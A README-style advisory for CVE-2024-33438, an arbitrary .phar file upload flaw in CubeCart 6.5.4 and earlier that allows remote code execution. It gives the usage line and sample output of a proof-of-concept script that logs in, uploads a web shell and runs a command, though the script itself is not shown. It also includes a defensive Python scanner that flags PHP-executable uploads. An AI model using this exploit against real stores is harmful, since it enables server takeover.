CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload that leads to remote code execution (RCE).

julio-cfa/CVE-2024-33438

Arbitrary File Upload Leads to RCE (CVE-2024-33438)

CubeCart <= 6.5.4 is vulnerable to an arbitrary file upload issue that leads to remote code execution (RCE). The application's file manager and its upload filters allow attackers to upload .phar files containing malicious code. CubeCart should be updated to 6.5.5, which implements a security patch that fixes this vulnerability.

For more details, please see the official announcement by CubeCart in the references.

Exploit

An automated proof-of-concept (PoC) has been created, but this vulnerability can also be exploited manually by uploading a malicious .phar file via the file manager.

PoC usage:

Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>

A successful exploitation produces the following output:

python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami

     []  ,----.___
   __||_/___      '.
  / O||    /|
 /   ""   / /
/________/ /   launching exploit
|________|/    please wait...

[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...

Output: www-data
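
To check a host for files left behind by this kind of upload, the following added example (not part of this repository or of CubeCart) walks an upload directory and reports files that carry a PHP-handled extension in any position or contain PHP or phar markers. The extension set, the marker list, the function names and the sample files are assumptions made for illustration.

```python
import tempfile
from pathlib import Path

# Assumption: extensions commonly mapped to the PHP handler by web server configs.
PHP_EXTENSIONS = {".php", ".phar", ".phtml", ".pht", ".php5", ".php7"}
# PHP open tags and the stub terminator that every phar archive carries.
PHP_MARKERS = (b"<?php", b"<?=", b"__HALT_COMPILER();")

def classify(path, head_bytes=4096):
    """Return the reasons why `path` looks executable as PHP (empty if none)."""
    reasons = []
    name = path.name.lower().rstrip(". ")  # ignore case and trailing dots/spaces
    # Check every extension segment so "x.phar.jpg" is reported as well.
    segments = {"." + s for s in name.split(".")[1:]}
    hits = sorted(segments & PHP_EXTENSIONS)
    if hits:
        reasons.append("extension:" + ",".join(hits))
    with path.open("rb") as fh:
        head = fh.read(head_bytes)
    hit = next((m for m in PHP_MARKERS if m in head), None)
    if hit:
        reasons.append("content:" + hit.decode())
    return reasons

def scan_uploads(root):
    """Walk `root` and map each suspicious relative path to its reasons."""
    findings = {}
    for path in Path(root).rglob("*"):
        reasons = classify(path) if path.is_file() else []
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    """Build a constructed upload tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample files, not real artifacts
            "logo.png": b"\x89PNG\r\n\x1a\n....",
            "notes.phar": b"<?php echo 'constructed sample'; ?>",
            "banner.PHAR.jpg": b"\xff\xd8\xff\xe0....",
            "photo.jpg": b"\xff\xd8\xff<?php /* constructed */ ?>",
        }
        for name, data in samples.items():
            Path(root, name).write_bytes(data)
        return scan_uploads(root)

if __name__ == "__main__":
    for rel, why in demo().items():
        print(rel, why)
```

On a real host, call `scan_uploads()` with the directory the file manager writes to; the content check is a heuristic and can flag legitimate files that happen to contain these byte sequences.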

References
